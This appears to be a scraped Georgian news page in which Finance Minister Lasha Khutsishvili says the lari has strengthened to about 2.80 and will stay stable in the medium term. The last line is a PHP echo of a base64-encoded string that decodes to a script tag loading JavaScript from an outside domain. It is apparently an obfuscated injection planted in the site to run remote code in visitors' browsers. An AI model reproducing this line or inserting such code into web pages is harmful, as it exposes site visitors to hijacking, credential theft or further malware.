celsiusi
ავერსი შნაიდერი
ლარი ბოლო პერიოდში არსებითად არის გამყარებული - საშუალოვადიან პერიოდში ლარი სტაბილურობას შეინარჩუნებს, - ამის შესახებ ფინანსთა მინისტრმა, ლაშა ხუციშვილმა მთავრობის სხდომის დასრულების შემდეგ განაცხადა.
 
მინისტრის თქმით, ლარის სტაბილურობას უზრუნველყოფს ის ეკონომიკური აქტივობა, რაც დღეს ქვეყანაშია.
 
„ლარი ბოლო პერიოდში არსებითად არის გამყარებული. იცით, რომ მაშინ, როდესაც საომარი მოქმედებები დაიწყო უკრაინაში, ლარი 3.40-ის ფარგლებში იყო, შემდეგ სტაბილურად იყო 3.05-ის მიდამოებში. დღეს, ბოლო 2 დღის ვაჭრობის შედეგად არის 2.80-ის ფარგლებში.
 
ფულადი ნაკადების შემოდინებას განსაზღვრავს ექსპორტის მზარდი მაჩვენებელი, ტურიზმის აღდგენის მზარდი მაჩვენებელი, ფულადი შემოდინებების მზარდი მაჩვენებელიც, რათა საშუალოვადიან პერიოდში ლარმა სტაბილურობა შეინარჩუნოს.
 
ბუნებრივია, ყოველდღიური მონაცემებიდან გამომდინარე შესაძლებელია მერყეობის ხასიათი იყოს, თუმცა, საშუალოვადიან პერიოდში ლარი იქნება სტაბილური, ამას უზრუნველყოფს ის ეკონომიკური აქტივობა, რომელიც დღეს ქვეყანაშია. ძალიან რთულია ყოველდღიურად ლარის ცვლილებაზე კომენტარი. ეს ბევრ ფაქტორს უკავშირდება. საშუალოვადიან პერიოდში ლარი შეინარჩუნებს სტაბილურობას“,- აღნიშნავს ხუციშვილი.
740
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");